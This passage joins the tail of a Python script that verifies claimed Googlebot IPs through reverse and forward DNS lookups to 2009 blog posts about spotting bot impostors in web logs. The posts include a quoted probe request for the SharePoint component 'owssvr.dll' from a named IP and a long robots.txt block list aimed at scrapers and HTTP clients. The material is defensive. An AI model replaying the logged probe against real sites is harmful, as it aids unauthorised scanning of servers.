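    """Return 'verified' or an 'impostor:<reason>' verdict for one client IP."""
    host = reverse(ip)
    if not host:
        return "impostor:no-ptr"
    host = host.rstrip(".").lower()
    # Suffix match with the leading dot: 'googlebot.com.hosting.example' must fail.
    if not host.endswith(GOOGLE_SUFFIXES):
        return "impostor:ptr-not-google"
    # Whoever controls an IP block controls its PTR records, so the name is only
    # trusted if it resolves back to the same address.
    if ip not in forward(host):
        return "impostor:forward-mismatch"
    return "verified"


def audit(rows, reverse=system_reverse, forward=system_forward):
    """Map each IP whose user agent claims Googlebot to a verdict (one lookup per IP)."""
    verdicts = {}
    for ip, user_agent in rows:
        if "googlebot" not in user_agent.lower() or ip in verdicts:
            continue
        verdicts[ip] = verify_googlebot_ip(ip, reverse, forward)
    return verdicts


# Constructed DNS data so the example runs offline.
FAKE_PTR = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",
    "198.51.100.7": "googlebot.com.hosting.example",     # look-alike name
    "203.0.113.5": "crawl-203-0-113-5.googlebot.com",    # PTR set by the IP's owner
}
FAKE_A = {
    "crawl-192-0-2-10.googlebot.com": {"192.0.2.10"},
    # No forward record maps back to 203.0.113.5.
}

# Constructed sample rows: (client IP, user agent).
SAMPLE_ROWS = [
    ("192.0.2.10", GOOGLEBOT_UA),
    ("198.51.100.7", GOOGLEBOT_UA),
    ("203.0.113.5", GOOGLEBOT_UA),
    ("203.0.113.77", GOOGLEBOT_UA),             # no PTR record at all
    ("198.51.100.99", "Mozilla/4.0 (compatible;)"),
]


def demo():
    """Run the audit against the constructed DNS tables."""
    return audit(SAMPLE_ROWS,
                 reverse=FAKE_PTR.get,
                 forward=lambda host: FAKE_A.get(host, set()))


if __name__ == "__main__":
    for ip, verdict in demo().items():
        print(ip, verdict)
```

Called without the `reverse` and `forward` arguments, `audit` uses the system resolver, so it can be pointed at (IP, user agent) pairs pulled from a real log.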
Google Impostor - CoreExpress
There's a Google impostor in our logs - unless Google is on the Core Express network.
On 3/4/2009 4:47:01 AM someone at this IP address: 64.69.46.217 was putting GoogleBot in their user agent.
OrgName: CoreExpress
OrgID: COEX
Address: 600 W. 7th Street
Address: Suite 360
City: Los Angeles
StateProv: CA
PostalCode: 90017
Country: US
NetRange: 64.69.32.0 - 64.69.47.255
Saturday, May 30, 2009
owssvr.dll - attempted access
This IP: 71.112.91.22 on the Verizon network was trying to access an IE component on our site that does not exist:
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211&STRMVER=4&CAPREQ=0
Friday, May 29, 2009
Robots.txt - More bots than people
Is your web site getting more hits from bots than people? You might want to try this in your robots.txt file. It blocks out a lot of bots we've seen but not major search engines. Alter as desired:
User-Agent: OnTownsBot
Disallow: /
User-Agent: ServageRobot
Disallow: /
User-Agent: uw_cse_xwc
Disallow: /
User-Agent: ZupeeCrawler
Disallow: /
User-Agent: uberbot
Disallow: /
User-Agent: Axonize-bot
Disallow: /
User-Agent: ips-agent
Disallow: /
User-Agent: RiceComputerArchitecture
Disallow: /
User-Agent: AISearchBot
Disallow: /
User-Agent: flatlandbot
Disallow: /
User-Agent: FairShare
Disallow: /
User-Agent: SapphireWebCrawler
Disallow: /
User-Agent: LocalBot
Disallow: /
User-Agent: LaBot
Disallow: /
User-Agent: Butterfly
Disallow: /
User-Agent: robotgenius
Disallow: /
User-Agent: WillyBot
Disallow: /
User-Agent: GingerCrawler
Disallow: /
User-Agent:larbin
Disallow: /
User-Agent: ru_com_viewer
Disallow: /
User-Agent:Yandex
Disallow: /
User-Agent:yandex
Disallow: /
User-Agent:msnbot-media
Disallow: /
Sitemap: http://www.rainierrhododendrons.com/sitemap.xml
User-Agent:del.icio.us
Disallow: /
User-Agent:Sika
Disallow: /
User-Agent:whois.de
Disallow: /
User-Agent:Isidorus
Disallow: /
User-Agent:Yanga
Disallow: /
User-Agent:MSR-ISRCCrawler
Disallow: /
User-Agent:Snappybot
Disallow: /
User-Agent:Gaisbot
Disallow: /
User-Agent:SapphireWebCrawler
Disallow: /
User-Agent:BobCrawl
Disallow: /
User-Agent:OpenX
Disallow: /
User-Agent:Axonize-bot
Disallow: /
User-Agent:KaloogaBot
Disallow: /
User-Agent:kalooga
Disallow: /
User-Agent:OnTownsBot
Disallow: /
User-Agent:Cazoodle-Bot
Disallow: /
User-Agent: REAP-Crawler
Disallow: /
User-Agent: DotBot
Disallow: /
User-Agent: Gigabot
Disallow: /
User-Agent: NetcraftSurveyAgent
Disallow: /
User-Agent: SurveyBot
Disallow: /
User-Agent: DBLBot
Disallow: /
User-Agent: AISearchBot
Disallow: /
User-Agent: Charlotte
Disallow: /
User-agent: IntegraTelecom
Disallow: /
User-agent: PSIBots
Disallow: /
User-agent:Websense
Disallow: /
User-agent:HornySexSearch
Disallow: /
User-agent: SnapPreviewBot
Disallow: /
User-agent: Snoopy
Disallow: /
User-agent: libwww-perl
Disallow: /
User-agent: nexen
Disallow: /
User-agent: phpversion
Disallow: /
User-agent: attributor
Disallow: /
User-agent: Java
Disallow: /
User-agent: bsalsa
Disallow: /
User-agent: whoisde.de
Disallow: /
User-agent: envolk
Disallow: /
User-agent: QEAVis
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-agent: boitho.com
Disallow: /
User-agent: boitho
Disallow: /
User-agent: Wget
Disallow: /
User-agent: Rankivabot
Disallow: /
User-agent: T-Online Browser
Disallow: /
User-agent: webalta
Disallow: /
User-agent: page_prefetcher
Disallow: /
User-agent: cyberpatrol
Disallow: /
User-agent: sitecat
Disallow: /
User-agent: cyberpatrolcrawler
Disallow: /
User-agent: internetseer
Disallow: /
User-agent: searchme
Disallow: /
User-agent: dcbot
Disallow: /
User-agent: scoutjet
Disallow: /
User-agent: sphsearch
Disallow: /
User-agent: exabot
Disallow: /
User-agent: NaverBot
Disallow: /
User-agent: naverbot
Disallow: /
User-agent: twiceler
Disallow: /
User-agent: zermelo
Disallow: /
User-agent: Moozilla
Disallow: /
User-agent: kyluka
Disallow: /
User-agent: scoutjet
Disallow: /
User-agent: baiduspider
Disallow: /
User-agent: MLBot
Disallow: /
User-agent: worio
Disallow: /
User-agent: turnitinbot
Disallow: /
User-agent: exooba
Disallow: /
User-agent: ViolaBot
Disallow: /
User-agent: speedyspider
Disallow: /
User-agent: becomebot
Disallow: /
# disallow Googlebot-Image
User-agent: Googlebot-Image
Disallow: /
User-agent: MJ12bot
Disallow: /
User-agent: QEAVis
Disallow: /
User-agent: VWBot
Disallow: /
User-agent: ShopWiki
Disallow: /
User-agent: SnapPreviewBot
Disallow: /
User-agent: panscient.com
Disallow: /
User-agent: panscient
Disallow: /
User-agent: sproose
Disallow: /
User-agent: voyager
Disallow: /
User-agent: grub
Disallow: /
User-agent: libwww-perl
Disallow: /
User-agent: OmniExplorer_Bot
Disallow: /
User-agent: Twiceler
Disallow: /
User-agent: WebDataCentreBot
Disallow: /
User-agent: OOZBOT
Disallow: /
User-agent: setooz
Disallow: /
User-agent: bsalsa
Disallow: /
User-agent: perl
Disallow: /
User-agent: botmobi
Disallow: /
User-agent: NextGenSearchBot
Disallow: /
User-agent: ASPSimply
Disallow: /
User-agent: Python-urllib
Disallow: /
User-agent: Moozilla
Disallow: /
User-agent: voilabot
Disallow: /
User-agent: WGet
Disallow: /
User-agent: obot
Disallow: /
User-agent: Java
Disallow: /
User-agent: libcurl-agent
Disallow: /
User-agent: phpversion
Disallow: /
User-agent: therarestparser
Disallow: /
User-agent: Jakarta Commons-HttpClient
Disallow: /